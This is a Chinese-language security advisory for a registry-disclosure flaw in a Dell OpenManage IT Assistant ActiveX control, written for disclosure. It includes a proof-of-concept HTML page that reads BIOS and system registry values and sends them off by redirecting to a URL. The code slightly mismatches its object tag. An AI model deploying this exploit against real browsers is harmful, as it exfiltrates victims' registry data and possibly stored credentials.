发布日期:2011-07-14
更新日期:2011-07-14
受影响系统:
Dell Dell OpenManage IT Assistant 8.9.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 48680
Dell OpenManage IT Assistant可以查找和提高各种Dell系统的摘要状态,包括客户机系统混合、服务器、具有远程访问卡的系统,Dell PowerConnect交换机,以及与机架密集型系统配合使用的数字键盘/视频/鼠标交换机。
Dell OpenManage IT Assistant在detectIESettingsForITA.OCX的实现上存在漏洞,远程攻击者可利用此漏洞获取泄露的敏感信息。
此漏洞源于detectIESettingsForITA ActiveX控件中的不安全"readRegVal()"方法,可允许查询注册码/注册值对,泄露任意注册表数据。
<*来源:rgod (rgod@autistici.org)
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
rgod (rgod@autistici.org)提供了如下测试方法:
<!--
Dell IT Assistant detectIESettingsForITA.ocx ActiveX Control
readRegVal() Remote Registry Dump Vulnerability
download uri:
ftp://ftp.us.dell.com/sysman/OM-ITAssistant-Dell-Web-WIN-6.5.0-2247_A01.21.exe
ActiveX settings:
CLSID: {6286EF1A-B56E-48EF-90C3-743410657F3C}
ProgID: DETECTIESETTINGS.detectIESettingsCtrl.1
Binary path: C:\WINDOWS\DOWNLO~1\DETECT~1.OCX
File Version: 8.1.0.0
Safe for Scripting (Registry): TRUE
Safe for Initialization: TRUE
The readRegVal() method allows to dump specific values from
the Windows registry.
Frome the typelib:
...
/* DISPID=1 */
/* VT_BSTR [8] */
function readRegVal(
/* VT_BSTR [8] */ $root,
/* VT_BSTR [8] */ $key,
/* VT_BSTR [8] */ $tag
)
{
/* method readRegVal */
}
...
Instead of searching inside a specific hive,
this control asks to specify a root key.
In my experience, lots of application stores encrypted or even
clear text passwords inside the registry, so an attacker
can abuse this to gain certain credentials from the victim
browser. If you ask me, this is not acceptable.
This sample code extracts BIOS informations and
redirects to a specified url with this info
passed as parameters.
Through some more programming efforts, you could dump a bigger
portion of the registry.
rgod
-->
<html>
<object classid='clsid:6286EF1A-B56E-48EF-90C3-743410657F3C' />
</object>
<script>
x = obj.readRegVal("HKLM","HARDWARE\\DESCRIPTION\\System\\BIOS","BaseBoardManufacturer");
document.write(x + "<BR>");
url="?BM=" + escape(x);
x = obj.readRegVal("HKLM","HARDWARE\\DESCRIPTION\\System\\BIOS","BaseBoardProduct");
document.write(x + "<BR>");
url+= "&BP=" + escape(x);
x = obj.readRegVal("HKLM","HARDWARE\\DESCRIPTION\\System\\BIOS","BaseBoardVersion");
document.write(x + "<BR>");
url+= "&BV=" + escape(x);
x = obj.readRegVal("HKLM","HARDWARE\\DESCRIPTION\\System\\BIOS","BIOSVendor");
document.write(x + "<BR>");
url+= "&BIOSV=" + escape(x);
x = obj.readRegVal("HKLM","HARDWARE\\DESCRIPTION\\System\\BIOS","BIOSVersion");
document.write(x + "<BR>");
url+= "&BIOSVE=" + escape(x);
x = obj.readRegVal("HKLM","HARDWARE\\DESCRIPTION\\System\\BIOS","SystemManufacturer");
document.write(x + "<BR>");
url+= "&SM=" + escape(x);
x = obj.readRegVal("HKLM","HARDWARE\\DESCRIPTION\\System\\BIOS","SystemProductName");
document.write(x + "<BR>");
url+= "&SP=" + escape(x);
x = obj.readRegVal("HKLM","HARDWARE\\DESCRIPTION\\System\\BIOS","SystemVersion");
document.write(x + "<BR>");
url+= "&SV=" + escape(x);
document.location= url;
</script>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Dell
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: